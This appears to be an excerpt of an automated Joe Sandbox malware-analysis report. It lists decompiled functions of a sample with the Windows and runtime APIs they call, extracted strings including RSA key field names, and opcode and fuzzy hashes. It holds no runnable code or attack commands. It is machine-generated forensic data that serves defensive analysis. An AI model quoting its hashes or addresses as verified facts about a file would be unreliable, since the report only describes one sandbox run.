SafeArrayDestroy.OLEAUT32(?), ref: 6D08240F

Strings

RS:h, xrefs: 6D08017F

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArrayDestroySafe
String ID: RS:h
API String ID: 4225690600-3891202347
Opcode ID: 620ae91f9412e1bf08adc27904f892d8de9720ccf7d69200d17c865607f770f7
Instruction ID: 6e25e0065801cff5aa68155d169d0ee7bf4a123ba6cde969143d343e1b14e779
Opcode Fuzzy Hash: 620ae91f9412e1bf08adc27904f892d8de9720ccf7d69200d17c865607f770f7
Instruction Fuzzy Hash: BC312A70E016199FEF10CFA9CC80B6EB7FAAF89300F208596E518EB256C771D9818B50

Uniqueness

Uniqueness Score: -1.00%

Function 6D080237 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6D0823B3
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823C3
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823D6
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823E9
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823FC
SafeArrayDestroy.OLEAUT32(?), ref: 6D08240F

Strings

RS3g, xrefs: 6D080286

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArrayDestroySafe
String ID: RS3g
API String ID: 4225690600-2794631155
Opcode ID: 38111814b03541b1f523cb5c487b2256ad3c96600d259a66b3a7f33f8940fa53
Instruction ID: 0829b41b95dbe869bef387851bff369a44a91abb1a2f86fde4348d39c50b759f
Opcode Fuzzy Hash: 38111814b03541b1f523cb5c487b2256ad3c96600d259a66b3a7f33f8940fa53
Instruction Fuzzy Hash: 20312A70A046199FDF10CFA9CD80B6DB7F9AF89200F608696E519EB252CB71D941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6D0BC760 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 95COMMON

Download Yara Rule

APIs

type_info::operator!=.LIBCMT ref: 6D0BC7EB

Strings

ModPrime1PrivateExponent, xrefs: 6D0BC840
MultiplicativeInverseOfPrime2ModPrime1, xrefs: 6D0BC815
Prime2, xrefs: 6D0BC876
Prime1, xrefs: 6D0BC88A
PrivateExponent, xrefs: 6D0BC85F
ModPrime2PrivateExponent, xrefs: 6D0BC82C

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: type_info::operator!=
String ID: ModPrime1PrivateExponent$ModPrime2PrivateExponent$MultiplicativeInverseOfPrime2ModPrime1$Prime1$Prime2$PrivateExponent
API String ID: 2241493438-339133643
Opcode ID: 5c30273d7edb8fde7d88145520848907662a8b82f139c9ef1922dab82c75acbc
Instruction ID: 2d0e5a28bf37f4d0905d1ae5c95015970f7f008ddcaa002bb141c74b5d22a339
Opcode Fuzzy Hash: 5c30273d7edb8fde7d88145520848907662a8b82f139c9ef1922dab82c75acbc
Instruction Fuzzy Hash: 3A318C70A1C3419ED7009F79888575ABBE1EFD6208F014A6EF5489B361EB71D848CB86

Uniqueness

Uniqueness Score: -1.00%

Function 6D080457 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6D0823B3
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823C3
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823D6
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823E9
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823FC
SafeArrayDestroy.OLEAUT32(?), ref: 6D08240F

Strings

RS%e, xrefs: 6D080494

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArrayDestroySafe
String ID: RS%e
API String ID: 4225690600-1409579784
Opcode ID: 9f21530322b59905fd8df9a4a6693fa63b28e17d96a707d46d1e28538a4c8f08
Instruction ID: 8b728070acbd18596fec5fe5eeb70d361514de74eba2df25666febfcaffa73b6
Opcode Fuzzy Hash: 9f21530322b59905fd8df9a4a6693fa63b28e17d96a707d46d1e28538a4c8f08
Instruction Fuzzy Hash: 97310BB0E016189FEF10CBA9CC80B6DB7F9AF85300F64859AE559EB252C775D941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6D07AA00 Relevance: 12.3, APIs: 8, Instructions: 309COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6D07AA54
VariantInit.OLEAUT32(?), ref: 6D07AA5B
VariantInit.OLEAUT32(?), ref: 6D07AA62
VariantInit.OLEAUT32(?), ref: 6D07AA69
VariantClear.OLEAUT32(?), ref: 6D07ACF2
VariantClear.OLEAUT32(?), ref: 6D07ACF9
VariantClear.OLEAUT32(?), ref: 6D07AD00
VariantClear.OLEAUT32(?), ref: 6D07AD07

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Variant$ClearInit
String ID:
API String ID: 2610073882-0
Opcode ID: 51ce6fed4565021ffdbee1b2552bb3df73ff49d07cde0ed7fad4d518b6bdd232
Instruction ID: 8502c4aa23b06098341a93ee0f8af9253dbfcf8af8bd4a5af60c6aab8a07f847
Opcode Fuzzy Hash: 51ce6fed4565021ffdbee1b2552bb3df73ff49d07cde0ed7fad4d518b6bdd232
Instruction Fuzzy Hash: 5CC137716087019FE310DF68C880E6AB7EAFFC8304F248A5DF5998B265D775E845CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6D079D00 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 326COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6D079DEB
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D079DFB
SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6D079E29
SafeArrayDestroy.OLEAUT32(?), ref: 6D079F25
VariantClear.OLEAUT32(?), ref: 6D079FE5

Strings

@, xrefs: 6D079DD7

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArraySafe$Bound$ClearDestroyElementVariant
String ID: @
API String ID: 3214203402-2766056989
Opcode ID: cf4fc352f26f3bae0929181453b8fa9d771276ee948c9d624160f3b7cb431dfd
Instruction ID: 04ff69a45e7b6ede1101e531994e168e39099528b586a5b80b944a9f64c133a0
Opcode Fuzzy Hash: cf4fc352f26f3bae0929181453b8fa9d771276ee948c9d624160f3b7cb431dfd
Instruction Fuzzy Hash: B6D15971D0424ACFEB10DFA8C884BADBBF5BF88304F64856DE519AB344D731AA45CB94

Uniqueness

Uniqueness Score: -1.00%

Function 6D07B300 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 326COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6D07B3EB
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D07B3FB
SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6D07B429
SafeArrayDestroy.OLEAUT32(?), ref: 6D07B525
VariantClear.OLEAUT32(?), ref: 6D07B5E5

Strings

@, xrefs: 6D07B3D7

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArraySafe$Bound$ClearDestroyElementVariant
String ID: @
API String ID: 3214203402-2766056989
Opcode ID: 78fb1cf51db3b405888ab346b3915a70defcbf1f8a85bb2bc68768e1fe7eb7a5
Instruction ID: 0d37732e311cf7cec6d8b60ec3f25780d4d6671f000e33bb5f09e99a508a6298
Opcode Fuzzy Hash: 78fb1cf51db3b405888ab346b3915a70defcbf1f8a85bb2bc68768e1fe7eb7a5
Instruction Fuzzy Hash: BBD15971E0024ADFEB10DFA8C884BADBBF5FF48304F64816DE515AB254D734AA45CB94

Uniqueness

Uniqueness Score: -1.00%

Function 6D0A1580 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 277COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 6D0A16B2

Part of subcall function 6D0CAC75: RaiseException.KERNEL32(?,?,6D0C9C34,400BD10B,?,?,?,?,6D0C9C34,400BD10B,6D0F9C90,6D10B974,400BD10B), ref: 6D0CACB7

__CxxThrowException@8.LIBCMT ref: 6D0A180A

Part of subcall function 6D064010: std::_Xinvalid_argument.LIBCPMT ref: 6D06402A

Strings

exceeds the maximum of , xrefs: 6D0A173F
for this public key, xrefs: 6D0A1771
: message length of , xrefs: 6D0A170D
: this key is too short to encrypt any messages, xrefs: 6D0A162A

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaiseXinvalid_argumentstd::_
String ID: exceeds the maximum of $ for this public key$: message length of $: this key is too short to encrypt any messages
API String ID: 3807434085-412673420
Opcode ID: 612283677490ba2d562387be2d54f9f0e4b7693063e18f0a64a79e6c0f52d7e7
Instruction ID: a0be0e516ff3ca8123f74c8f7f667f285191e3f03058668441b16e8c4d8b55d9
Opcode Fuzzy Hash: 612283677490ba2d562387be2d54f9f0e4b7693063e18f0a64a79e6c0f52d7e7
Instruction Fuzzy Hash: B1B13C7150C380AFE320DB68D890F9BB7E9AFD9304F15891DE69D87291DB70A505CBA3

Uniqueness

Uniqueness Score: -1.00%

Function 6D0C13A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 129COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6D0C13BE

Part of subcall function 6D0C90D8: std::exception::exception.LIBCMT ref: 6D0C90ED
Part of subcall function 6D0C90D8: __CxxThrowException@8.LIBCMT ref: 6D0C9102
Part of subcall function 6D0C90D8: std::exception::exception.LIBCMT ref: 6D0C9113

_memmove.LIBCMT ref: 6D0C1431
_memmove.LIBCMT ref: 6D0C1456
_memmove.LIBCMT ref: 6D0C1493
_memmove.LIBCMT ref: 6D0C14B0

Strings

deque<T> too long, xrefs: 6D0C13B9

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: _memmove$std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: deque<T> too long
API String ID: 4034224661-309773918
Opcode ID: 91f04216bec056fa9da9692c47ccb9a5de0dd5b8898ef650072c3f809556a214
Instruction ID: 807ecf26a6aea7ac34d8c960439c43142fc60a7d9adfa2589c667e7ad1e778e3
Opcode Fuzzy Hash: 91f04216bec056fa9da9692c47ccb9a5de0dd5b8898ef650072c3f809556a214
Instruction Fuzzy Hash: D341E872A042059BE704CE68DC91A6FB7E6EFC4214F19862CE849D7349EA34ED05C7A3

Uniqueness

Uniqueness Score: -1.00%

Function 6D0C1250 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 129COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6D0C126E

Part of subcall function 6D0C90D8: std::exception::exception.LIBCMT ref: 6D0C90ED
Part of subcall function 6D0C90D8: __CxxThrowException@8.LIBCMT ref: 6D0C9102
Part of subcall function 6D0C90D8: std::exception::exception.LIBCMT ref: 6D0C9113

_memmove.LIBCMT ref: 6D0C12E0
_memmove.LIBCMT ref: 6D0C1305
_memmove.LIBCMT ref: 6D0C1342
_memmove.LIBCMT ref: 6D0C135F

Strings

deque<T> too long, xrefs: 6D0C1269

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: _memmove$std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: deque<T> too long
API String ID: 4034224661-309773918
Opcode ID: c9d8e7694fc62329d6deb59953ba1debd0e5ad1cdef951ac0e3cf2e6fbae07c1
Instruction ID: 62b65fe460ef86bb9c1b27f7e8c680620519ba7fa051ac36cd14deb8b32b37c0
Opcode Fuzzy Hash: c9d8e7694fc62329d6deb59953ba1debd0e5ad1cdef951ac0e3cf2e6fbae07c1
Instruction Fuzzy Hash: 3A41EA72A042059BE704CE68DC8176FB7D6EBC4218F19862DE849D7345EA34ED058793

Uniqueness

Uniqueness Score: -1.00%

Function 6D064D90 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 100COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6D064DA9

Part of subcall function 6D0C9125: std::exception::exception.LIBCMT ref: 6D0C913A
Part of subcall function 6D0C9125: __CxxThrowException@8.LIBCMT ref: 6D0C914F
Part of subcall function 6D0C9125: std::exception::exception.LIBCMT ref: 6D0C9160

std::_Xinvalid_argument.LIBCPMT ref: 6D064DCA
std::_Xinvalid_argument.LIBCPMT ref: 6D064DE5
_memmove.LIBCMT ref: 6D064E4D

Strings

invalid string position, xrefs: 6D064DA4
string too long, xrefs: 6D064DC5, 6D064DE0

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position$string too long
API String ID: 443534600-4289949731
Opcode ID: 34eeceae507a9cc869baa06444263fe7cf69a9233658b8299b1012742059d0ed
Instruction ID: dd401bae1a43b2963eae821f23a9b8ace37006a169a221c57909bf150445a086
Opcode Fuzzy Hash: 34eeceae507a9cc869baa06444263fe7cf69a9233658b8299b1012742059d0ed
Instruction Fuzzy Hash: 8131E832708241AFF3258E5CF8A0B6EF7E9EB98765B20062EE551CB241C771D840C3B1

Uniqueness

Uniqueness Score: -1.00%

Function 6D0D44E9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBCMT ref: 6D0D4532
DName::operator+.LIBCMT ref: 6D0D4539
DName::DName.LIBCMT ref: 6D0D455B
DName::operator+.LIBCMT ref: 6D0D4562
DName::operator+.LIBCMT ref: 6D0D4569

Strings

throw(, xrefs: 6D0D452A, 6D0D4553

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Name::operator+$NameName::
String ID: throw(
API String ID: 168861036-3159766648
Opcode ID: 3752fb15def89c2ceb44a96b0ecf0f2866d0f6ec198b9ca5185da78e07b0d9ff
Instruction ID: 12f2d88f989044722f1090ca38db850f3c7f6d788d743991393c54d1bea578c7
Opcode Fuzzy Hash: 3752fb15def89c2ceb44a96b0ecf0f2866d0f6ec198b9ca5185da78e07b0d9ff
Instruction Fuzzy Hash: 3F019274604209BFEF04DBA4D841FFD7BB9EB88348F41405AEA059B295DB70D9468B90

Uniqueness

Uniqueness Score: -1.00%

Function 6D0CE9B9 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,6D0F9880,00000008,6D0CEAC1,00000000,00000000,?,?,6D0CD7DD,6D0C9DEF,00000000,?,6D0C9BD4,6D061290,400BD10B), ref: 6D0CE9CA
__lock.LIBCMT ref: 6D0CE9FE

Part of subcall function 6D0D2438: __mtinitlocknum.LIBCMT ref: 6D0D244E
Part of subcall function 6D0D2438: __amsg_exit.LIBCMT ref: 6D0D245A
Part of subcall function 6D0D2438: EnterCriticalSection.KERNEL32(6D0C9BD4,6D0C9BD4,?,6D0CEA03,0000000D), ref: 6D0D2462

InterlockedIncrement.KERNEL32(FFFFFEF5), ref: 6D0CEA0B
__lock.LIBCMT ref: 6D0CEA1F
___addlocaleref.LIBCMT ref: 6D0CEA3D

Strings

KERNEL32.DLL, xrefs: 6D0CE9C5

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
String ID: KERNEL32.DLL
API String ID: 637971194-2576044830
Opcode ID: 033fd9a9ea5863c1b3931a62b07d07d3d17f1ece3f8986b2624dafa696f8052e
Instruction ID: cb7a8b30881658172f65bd9c3e08e3f53fcd83431c2b31a8fa7f1a5539695d4a
